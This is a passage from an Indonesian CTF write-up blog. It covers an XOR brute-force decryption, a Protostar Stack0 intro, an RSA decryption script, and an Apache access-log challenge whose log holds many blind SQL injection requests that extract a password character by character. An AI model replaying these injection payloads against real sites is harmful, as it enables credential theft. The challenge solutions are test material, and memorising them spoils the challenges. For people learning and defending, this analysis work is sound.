Saturday, February 25, 2017

AgriHack : Kripto Xor (Lupa Nama Soal)

disini kita di beri 2 buah file, yang pertama adalah file pdf yang di enkripsi, dan yang kedua adalah program untuk enkripsi file terseb... thumbnail 1 summary

disini kita di beri 2 buah file, yang pertama adalah file pdf yang di enkripsi, dan yang kedua adalah program untuk enkripsi file tersebut,


terlihat di program enkripsi setiap byte dari file di XOR dengan key yang di dapat dari function os.urandom(1) yang di simpan ke variable randomku, beruntung key yang di gunakan hanya 1, sehingga sangat memungkinkan untuk kita bruteforce keynya, mari kita buat script untuk decrypt file tersebut, karena file di enkripsi cuman di xor dengan kunci, kita bisa melakukan decrypt hanya dengan sedikit memodifikasi program enkripsi..


setelah di jalankan kita akan mendapat 1 file pdf yang kita inginkan..


Flag : AGRI{do_y0u_3ven_bruteforce}

Tuesday, February 21, 2017

Protostar : Stack0

This level introduces the concept that memory can be accessed outside of its allocated region, how the stack variables are laid out, and ... thumbnail 1 summary

This level introduces the concept that memory can be accessed outside of its allocated region, how the stack variables are laid out, and that modifying outside of the allocated memory can modify program execution.




yeay..  variabel modified has been modified..\\m// \\0//

Saturday, February 18, 2017

Pwnerrank : RSA - Basic

Task : Challenge : Recover the original message M, use  www.factordb.com  to get p and q,  p =  15100118367560938297 q =   18238... thumbnail 1 summary
Task :
Challenge : Recover the original message M,
use www.factordb.com to get p and q, 

 p = 15100118367560938297
q =  18238194893394268367

 ok lets start to recover..

#! /usr/bin/env python
# Johan Wahyudi
import gmpy
p = 15100118367560938297
q = 18238194893394268367
e = 5
c = 170841202002112185870598344402287193795
n = p*q
phi = (p-1)*(q-1)
d = gmpy.invert(e,phi)
pesan = hex(pow(c,d,n))[2:]
#pesan_asli = pesan.decode("hex")
print pesan
#print pesan_asli
view raw RSA_Basic.py hosted with ❤ by GitHub

Pwnerrank : Apache Access Log

Kita di beri sebuah file access log dari service apache, yang mana dari clue soal memberi tahu kita kalau di server ada serangan Sql Inj... thumbnail 1 summary

Kita di beri sebuah file access log dari service apache, yang mana dari clue soal memberi tahu kita kalau di server ada serangan Sql Injection, mari kita analisa, silahkan teman teman buat script analisa sendiri, atau mau analisa manual juga gk apa, karena buat script juga awalnyo perlu di analisa hehe.. .

Kalo belum tahu apa itu sql injection monggo ke gugel dulu :), terutama untuk blind sql injection, 
karena attack based di log ini adalah blind sql injection.

 Log :
127.0.0.1 - - [10/Aug/2016:16:40:31 -0400] "GET /?id=7%20and%20length(password)%3E5 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:31 -0400] "GET /?id=7%20and%20length(password)%3E10 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:31 -0400] "GET /?id=7%20and%20length(password)%3E15 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:31 -0400] "GET /?id=7%20and%20length(password)%3E20 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:31 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:32 -0400] "GET /?id=7%20and%20length(password)=19 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:32 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:32 -0400] "GET /?id=7%20and%20length(password)=18 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:32 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:32 -0400] "GET /?id=7%20and%20length(password)=17 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:33 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:33 -0400] "GET /?id=7%20and%20length(password)=16 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:33 -0400] "GET /?id=7%20and%20ord(substr(password,1,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:33 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:33 -0400] "GET /?id=7%20and%20ord(substr(password,1,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:34 -0400] "GET /?id=7%20and%20ord(substr(password,1,1))%3E95 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:34 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:34 -0400] "GET /?id=7%20and%20ord(substr(password,1,1))%3E79 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:34 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:34 -0400] "GET /?id=7%20and%20ord(substr(password,1,1))%3E71 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:35 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:35 -0400] "GET /?id=7%20and%20ord(substr(password,1,1))%3E67 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:35 -0400] "GET /?id=7%20and%20ord(substr(password,1,1))%3E69 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:35 -0400] "GET /?id=7%20and%20ord(substr(password,1,1))%3E70 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:35 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:35 -0400] "GET /?id=7%20and%20ord(substr(password,2,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:36 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:36 -0400] "GET /?id=7%20and%20ord(substr(password,2,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:36 -0400] "GET /?id=7%20and%20ord(substr(password,2,1))%3E95 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:36 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:36 -0400] "GET /?id=7%20and%20ord(substr(password,2,1))%3E79 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:37 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:37 -0400] "GET /?id=7%20and%20ord(substr(password,2,1))%3E71 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:37 -0400] "GET /?id=7%20and%20ord(substr(password,2,1))%3E75 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:37 -0400] "GET /?id=7%20and%20ord(substr(password,2,1))%3E77 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:37 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:38 -0400] "GET /?id=7%20and%20ord(substr(password,2,1))%3E76 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:38 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:38 -0400] "GET /?id=7%20and%20ord(substr(password,3,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:38 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:38 -0400] "GET /?id=7%20and%20ord(substr(password,3,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:39 -0400] "GET /?id=7%20and%20ord(substr(password,3,1))%3E95 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:39 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:39 -0400] "GET /?id=7%20and%20ord(substr(password,3,1))%3E79 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:39 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:39 -0400] "GET /?id=7%20and%20ord(substr(password,3,1))%3E71 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:39 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:40 -0400] "GET /?id=7%20and%20ord(substr(password,3,1))%3E67 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:40 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:40 -0400] "GET /?id=7%20and%20ord(substr(password,3,1))%3E65 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:40 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:40 -0400] "GET /?id=7%20and%20ord(substr(password,3,1))%3E64 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:41 -0400] "GET /?id=7%20and%20ord(substr(password,4,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:41 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:41 -0400] "GET /?id=7%20and%20ord(substr(password,4,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:41 -0400] "GET /?id=7%20and%20ord(substr(password,4,1))%3E95 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:41 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:42 -0400] "GET /?id=7%20and%20ord(substr(password,4,1))%3E79 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:42 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:42 -0400] "GET /?id=7%20and%20ord(substr(password,4,1))%3E71 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:42 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:42 -0400] "GET /?id=7%20and%20ord(substr(password,4,1))%3E67 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:43 -0400] "GET /?id=7%20and%20ord(substr(password,4,1))%3E69 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:43 -0400] "GET /?id=7%20and%20ord(substr(password,4,1))%3E70 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:43 -0400] "GET /?id=7%20and%20ord(substr(password,5,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:43 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:43 -0400] "GET /?id=7%20and%20ord(substr(password,5,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:44 -0400] "GET /?id=7%20and%20ord(substr(password,5,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:44 -0400] "GET /?id=7%20and%20ord(substr(password,5,1))%3E111 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:44 -0400] "GET /?id=7%20and%20ord(substr(password,5,1))%3E119 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:44 -0400] "GET /?id=7%20and%20ord(substr(password,5,1))%3E123 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:44 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:44 -0400] "GET /?id=7%20and%20ord(substr(password,5,1))%3E121 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:45 -0400] "GET /?id=7%20and%20ord(substr(password,5,1))%3E122 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:45 -0400] "GET /?id=7%20and%20ord(substr(password,6,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:45 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:45 -0400] "GET /?id=7%20and%20ord(substr(password,6,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:45 -0400] "GET /?id=7%20and%20ord(substr(password,6,1))%3E95 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:46 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:46 -0400] "GET /?id=7%20and%20ord(substr(password,6,1))%3E79 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:46 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:46 -0400] "GET /?id=7%20and%20ord(substr(password,6,1))%3E71 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:46 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:47 -0400] "GET /?id=7%20and%20ord(substr(password,6,1))%3E67 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:47 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:47 -0400] "GET /?id=7%20and%20ord(substr(password,6,1))%3E65 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:47 -0400] "GET /?id=7%20and%20ord(substr(password,6,1))%3E66 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:47 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:48 -0400] "GET /?id=7%20and%20ord(substr(password,7,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:48 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:48 -0400] "GET /?id=7%20and%20ord(substr(password,7,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:48 -0400] "GET /?id=7%20and%20ord(substr(password,7,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:48 -0400] "GET /?id=7%20and%20ord(substr(password,7,1))%3E111 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:48 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:49 -0400] "GET /?id=7%20and%20ord(substr(password,7,1))%3E103 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:49 -0400] "GET /?id=7%20and%20ord(substr(password,7,1))%3E107 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:49 -0400] "GET /?id=7%20and%20ord(substr(password,7,1))%3E109 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:49 -0400] "GET /?id=7%20and%20ord(substr(password,7,1))%3E110 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:49 -0400] "GET /?id=7%20and%20ord(substr(password,8,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:50 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:50 -0400] "GET /?id=7%20and%20ord(substr(password,8,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:50 -0400] "GET /?id=7%20and%20ord(substr(password,8,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:50 -0400] "GET /?id=7%20and%20ord(substr(password,8,1))%3E111 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:50 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:50 -0400] "GET /?id=7%20and%20ord(substr(password,8,1))%3E103 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:51 -0400] "GET /?id=7%20and%20ord(substr(password,8,1))%3E107 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:51 -0400] "GET /?id=7%20and%20ord(substr(password,8,1))%3E109 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:51 -0400] "GET /?id=7%20and%20ord(substr(password,8,1))%3E110 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:51 -0400] "GET /?id=7%20and%20ord(substr(password,9,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:51 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:52 -0400] "GET /?id=7%20and%20ord(substr(password,9,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:52 -0400] "GET /?id=7%20and%20ord(substr(password,9,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:52 -0400] "GET /?id=7%20and%20ord(substr(password,9,1))%3E111 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:52 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:52 -0400] "GET /?id=7%20and%20ord(substr(password,9,1))%3E103 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:53 -0400] "GET /?id=7%20and%20ord(substr(password,9,1))%3E107 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:53 -0400] "GET /?id=7%20and%20ord(substr(password,9,1))%3E109 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:53 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:53 -0400] "GET /?id=7%20and%20ord(substr(password,9,1))%3E108 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:53 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:54 -0400] "GET /?id=7%20and%20ord(substr(password,10,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:54 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:54 -0400] "GET /?id=7%20and%20ord(substr(password,10,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:54 -0400] "GET /?id=7%20and%20ord(substr(password,10,1))%3E95 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:54 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:55 -0400] "GET /?id=7%20and%20ord(substr(password,10,1))%3E79 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:55 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:55 -0400] "GET /?id=7%20and%20ord(substr(password,10,1))%3E71 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:55 -0400] "GET /?id=7%20and%20ord(substr(password,10,1))%3E75 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:55 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:56 -0400] "GET /?id=7%20and%20ord(substr(password,10,1))%3E73 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:56 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:56 -0400] "GET /?id=7%20and%20ord(substr(password,10,1))%3E72 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:56 -0400] "GET /?id=7%20and%20ord(substr(password,11,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:56 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:57 -0400] "GET /?id=7%20and%20ord(substr(password,11,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:57 -0400] "GET /?id=7%20and%20ord(substr(password,11,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:57 -0400] "GET /?id=7%20and%20ord(substr(password,11,1))%3E111 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:57 -0400] "GET /?id=7%20and%20ord(substr(password,11,1))%3E119 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:57 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:57 -0400] "GET /?id=7%20and%20ord(substr(password,11,1))%3E115 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:58 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:58 -0400] "GET /?id=7%20and%20ord(substr(password,11,1))%3E113 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:58 -0400] "GET /?id=7%20and%20ord(substr(password,11,1))%3E114 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:58 -0400] "GET /?id=7%20and%20ord(substr(password,12,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:58 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:59 -0400] "GET /?id=7%20and%20ord(substr(password,12,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:59 -0400] "GET /?id=7%20and%20ord(substr(password,12,1))%3E95 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:59 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:59 -0400] "GET /?id=7%20and%20ord(substr(password,12,1))%3E79 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:59 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:00 -0400] "GET /?id=7%20and%20ord(substr(password,12,1))%3E71 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:00 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:00 -0400] "GET /?id=7%20and%20ord(substr(password,12,1))%3E67 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:00 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:00 -0400] "GET /?id=7%20and%20ord(substr(password,12,1))%3E65 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:01 -0400] "GET /?id=7%20and%20ord(substr(password,12,1))%3E66 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:01 -0400] "GET /?id=7%20and%20ord(substr(password,13,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:01 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:01 -0400] "GET /?id=7%20and%20ord(substr(password,13,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:01 -0400] "GET /?id=7%20and%20ord(substr(password,13,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:02 -0400] "GET /?id=7%20and%20ord(substr(password,13,1))%3E111 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:02 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:02 -0400] "GET /?id=7%20and%20ord(substr(password,13,1))%3E103 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:02 -0400] "GET /?id=7%20and%20ord(substr(password,13,1))%3E107 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:02 -0400] "GET /?id=7%20and%20ord(substr(password,13,1))%3E109 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
